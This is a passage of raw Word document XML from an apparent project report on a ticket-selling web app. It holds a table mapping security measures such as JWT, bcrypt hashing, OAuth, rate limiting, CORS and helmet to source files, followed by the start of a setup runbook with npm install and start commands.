            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>sanitizeRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="2BDD8C1B" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3CDD7DC8" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Authentication (JWT)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="182F46F6" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>jsonwebtoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68C21505" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Secure stateless authentication. Signs tokens, verifies identity, avoids session hijacking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78AD4FDB" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/routes/auth.js, token reading in client/App.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="243F85BC" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D54B1E9" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Password Hashing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="653A2A22" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>bcryptjs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="036F492D" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Hashes passwords before saving, preventing plaintext password storage and credential compromise.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5F56E943" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/models/User.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="7DCFB6E4" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="33FA4155" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Google OAuth Login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22A93106" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>passport, passport-google-oauth20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCA702C" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Allows secure third-party authentication using Google accounts, reduces password attack surface.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="243E1C48" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/server.js, server/routes/auth.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="574B8A9F" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24A846A2" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve">Rate Limiting (Brute Force </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Defense</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="66AA8DCA" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>express-rate-limit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="380E6F86" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Blocks excessive login attempts and API abuse, mitigating brute force and DoS attempts.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CD94C29" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="4DE2142B" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0811EBC7" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CORS Hardening</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="328EE7FE" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>cors</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2F66C5AE" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Ensures only trusted frontend (localhost:3000) can access backend API. Prevents cross-origin attacks.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="14BA65DA" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="344CDF84" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="752C8365" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>CSP + Security Headers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47B9A85C" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>helmet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="387CB634" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Adds secure headers (CSP, no inline scripts, disable object embedding). Prevents script injection &amp; clickjacking.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2366A822" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/server.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="2074914B" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0427A984" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Password Change Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="009EE946" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>bcryptjs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>jsonwebtoken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6B67DE5F" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Verifies current password, securely hashes the new one, updates JWT after change, prevents unauthorized account access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0ACAC858" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>server/routes/auth.js, frontend logic in client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>/App.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="484D283F" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="32F69C00" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Form Input Sanitization (Frontend)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="39CB76DB" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>HTML5 validation + React state</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D9B74A4" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>Blocks bad inputs early; improves UX &amp; reduces server workload.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD6A38C" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>/pages/Signup.js, client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>/pages/Login.js, client/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>src</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>/pages/SellTicket.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F13D01" w:rsidRPr="00F13D01" w14:paraId="650B7798" w14:textId="77777777" w:rsidTr="00AA1442">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ABB9793" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Sessionless</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t xml:space="preserve"> Architecture</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="49B2BBCB" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>JWT + No cookie storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="68DB28F8" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t xml:space="preserve">Prevents CSRF-based session riding. Keeps tokens in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t>localStorage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00F13D01">
              <w:t xml:space="preserve"> with strict CORS + CSP.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ABFA436" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01">
            <w:r w:rsidRPr="00F13D01">
              <w:t>client/App.js, server/routes/auth.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F96D6C9" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="00F13D01"/>
    <w:p w14:paraId="5A16AF2D" w14:textId="5EEC453E" w:rsidR="00EE11A0" w:rsidRPr="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="008907AE">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="40"/>
        </w:numPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc214584814"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Runbook (Step-by-Step-Guide)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2FD980F7" w14:textId="32BF4890" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc214584815"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Backend Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w14:paraId="1DFF4C58" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00BE7BE3" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66209433" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00BE7BE3" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6D1D3F" w14:textId="0AE24644" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B34A85B" w14:textId="10A0B5B3" w:rsidR="00EE11A0" w:rsidRDefault="00EE11A0" w:rsidP="004E318F">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc214584816"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>Frontend Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w14:paraId="21D6D89F" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cd client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A411F9B" w14:textId="77777777" w:rsidR="00F13D01" w:rsidRPr="00F13D01" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>npm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13D01">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> install</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E27F08" w14:textId="3F6660F7" w:rsidR="00F13D01" w:rsidRPr="00BE7BE3" w:rsidRDefault="00F13D01" w:rsidP="001A651C">
